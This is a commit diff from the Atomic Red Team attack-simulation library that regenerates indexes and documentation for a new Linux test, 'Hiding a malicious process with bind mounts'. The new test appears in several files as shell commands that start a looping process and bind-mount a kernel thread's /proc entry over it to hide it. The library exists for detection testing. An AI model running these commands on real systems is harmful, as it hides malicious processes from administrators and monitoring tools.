Generated docs from job=generate-docs branch=master [ci skip]

redcanaryco · Sep 24, 2024 · 1942961 · 1942961
1 parent 95856cc
commit 1942961
Show file tree

Hide file tree

Showing 12 changed files with 85 additions and 3 deletions.
diff --git a/README.md b/README.md
@@ -2,7 +2,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1641-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1642-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use

diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
@@ -392,6 +392,7 @@ defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
+defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,4,Hiding a malicious process with bind mounts,ad4b73c2-d6e2-4d8b-9868-4c6f55906e01,sh
 defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
 defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell

diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -99,6 +99,7 @@ defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Auditing Configu
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Logging Configuration Changes on FreeBSD Host,6b8ca3ab-5980-4321-80c3-bcd77c8daed8,sh
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
+defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,4,Hiding a malicious process with bind mounts,ad4b73c2-d6e2-4d8b-9868-4c6f55906e01,sh
 defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,1,ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI,062f92c9-28b1-4391-a5f8-9d8ca6852091,powershell
 defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
 defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh

diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
@@ -488,6 +488,7 @@
   - Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
   - Atomic Test #2: Creating W32Time similar named service using sc [windows]
   - Atomic Test #3: linux rename /proc/pid/comm using prctl [linux]
+  - Atomic Test #4: Hiding a malicious process with bind mounts [linux]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
   - Atomic Test #1: Process Injection via C# [windows]
   - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]

diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -145,6 +145,7 @@
 - T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1036.004 Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md)
   - Atomic Test #3: linux rename /proc/pid/comm using prctl [linux]
+  - Atomic Test #4: Hiding a malicious process with bind mounts [linux]
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.010 Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md)
   - Atomic Test #1: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI [linux]

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
@@ -17358,6 +17358,25 @@ defense-evasion:
         cleanup_command: 'rm -f #{exe_path}
 
           '
+    - name: Hiding a malicious process with bind mounts
+      auto_generated_guid: ad4b73c2-d6e2-4d8b-9868-4c6f55906e01
+      description: 'Creates a malicious process and hides it by bind mounting to the
+        /proc filesystem of a benign process
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        elevation_required: true
+        command: |
+          eval '(while true; do :; done) &'
+          echo $! > /tmp/evil_pid.txt
+          random_kernel_pid=$(ps -ef | grep "\[.*\]" | awk '{print $2}' | shuf -n 1)
+          sudo mount -B /proc/$random_kernel_pid /proc/$(cat /tmp/evil_pid.txt)
+        cleanup_command: |
+          kill $(cat /tmp/evil_pid.txt) || echo "Failed to kill PID $evil_pid"
+          rm /tmp/evil_pid.txt
+        name: sh
   T1055.004:
     technique:
       x_mitre_platforms:

diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml
@@ -9880,6 +9880,25 @@ defense-evasion:
         cleanup_command: 'rm -f #{exe_path}
 
           '
+    - name: Hiding a malicious process with bind mounts
+      auto_generated_guid: ad4b73c2-d6e2-4d8b-9868-4c6f55906e01
+      description: 'Creates a malicious process and hides it by bind mounting to the
+        /proc filesystem of a benign process
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        elevation_required: true
+        command: |
+          eval '(while true; do :; done) &'
+          echo $! > /tmp/evil_pid.txt
+          random_kernel_pid=$(ps -ef | grep "\[.*\]" | awk '{print $2}' | shuf -n 1)
+          sudo mount -B /proc/$random_kernel_pid /proc/$(cat /tmp/evil_pid.txt)
+        cleanup_command: |
+          kill $(cat /tmp/evil_pid.txt) || echo "Failed to kill PID $evil_pid"
+          rm /tmp/evil_pid.txt
+        name: sh
   T1055.004:
     technique:
       x_mitre_platforms:

diff --git a/atomics/T1036.004/T1036.004.md b/atomics/T1036.004/T1036.004.md
@@ -12,6 +12,8 @@ Tasks or services contain other fields, such as a description, that adversaries
 
 - [Atomic Test #3 - linux rename /proc/pid/comm using prctl](#atomic-test-3---linux-rename-procpidcomm-using-prctl)
 
+- [Atomic Test #4 - Hiding a malicious process with bind mounts](#atomic-test-4---hiding-a-malicious-process-with-bind-mounts)
+
 
 <br/>
 
@@ -130,4 +132,40 @@ cc -o #{exe_path} PathToAtomicsFolder/T1036.004/src/prctl_rename.c
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Hiding a malicious process with bind mounts
+Creates a malicious process and hides it by bind mounting to the /proc filesystem of a benign process
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** ad4b73c2-d6e2-4d8b-9868-4c6f55906e01
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+eval '(while true; do :; done) &'
+echo $! > /tmp/evil_pid.txt
+random_kernel_pid=$(ps -ef | grep "\[.*\]" | awk '{print $2}' | shuf -n 1)
+sudo mount -B /proc/$random_kernel_pid /proc/$(cat /tmp/evil_pid.txt)
+```
+
+#### Cleanup Commands:
+```sh
+kill $(cat /tmp/evil_pid.txt) || echo "Failed to kill PID $evil_pid"
+rm /tmp/evil_pid.txt
+```
+
+
+
+
+
 <br/>
diff --git a/atomics/T1036.004/T1036.004.yaml b/atomics/T1036.004/T1036.004.yaml
@@ -56,6 +56,7 @@ atomic_tests:
     cleanup_command: |
       rm -f #{exe_path}
 - name: Hiding a malicious process with bind mounts
+  auto_generated_guid: ad4b73c2-d6e2-4d8b-9868-4c6f55906e01
   description: |
     Creates a malicious process and hides it by bind mounting to the /proc filesystem of a benign process
   supported_platforms:

diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
@@ -1680,3 +1680,4 @@ f8160cde-4e16-4c8b-8450-6042d5363eb0
 7c35779d-42ec-42ab-a283-6255b28e9d68
 d9c32b3b-7916-45ad-aca5-6c902da80319
 8b87dd03-8204-478c-bac3-3959f6528de3
+ad4b73c2-d6e2-4d8b-9868-4c6f55906e01